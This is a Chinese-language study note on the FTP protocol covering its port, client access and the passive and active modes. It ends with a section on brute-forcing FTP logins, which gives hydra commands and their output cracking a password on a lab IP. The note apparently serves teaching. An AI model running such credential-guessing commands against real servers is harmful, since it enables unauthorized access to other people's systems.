应用层协议-FTP协议

应用层协议-FTP协议

1.概述

文件传输协议（File Transfer Protocol，FTP）是一种在网络中进行文件传输的广泛使用的标准协议。作为网络通信中的基础工具，FTP允许用户通过客户端软件与服务器进行交互，实现文件的上传、下载和其他文件操作。

FTP默认使用TCP/21端口

2.部署FTP服务器

客户端访问

打开文件资源管理器或任意一个文件夹都行,输入ftp://ftp服务器IP地址/

3 交互机制

4 被动模式

注意:被动模式说的是服务器,客户端开始与服务器协商被动模式,服务器把自己的IP和新的端口告诉客户端,客户端重新发起新的连接服务器新端口,服务器是被动等待客户端连接,连接成功后传输文件消息

5 主动模式

注意:客户端协商被动模式,被服务器拒绝掉,客户端把自己的IP和端口告诉服务器,服务器使用自己的20端口主动连接客户端,连接成功后主动把文件夹列表发送给客户端

6 FTP暴力破解

1.FTP文件服务器登录是没有错误密码次数限制
2.没有验证码这种机制
暴力破解:一个一个使用密码去试hydra -l zhangsan -p p-0p-0p-0 ftp://192.168.184.128
hydra -L '/home/kali/桌面/username.txt' -P '/home/kali/桌面/password.txt' ftp://192.168.184.128Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-01 12:05:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 56 login tries (l:8/p:7), ~4 tries per task
[DATA] attacking ftp://192.168.184.128:21/
[21][ftp] host: 192.168.184.128   login: zhangsan   password: p-0p-0p-0        表示暴力破解成功,账户:zhangsan,密码:p-0p-0p-0
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-01 12:05:52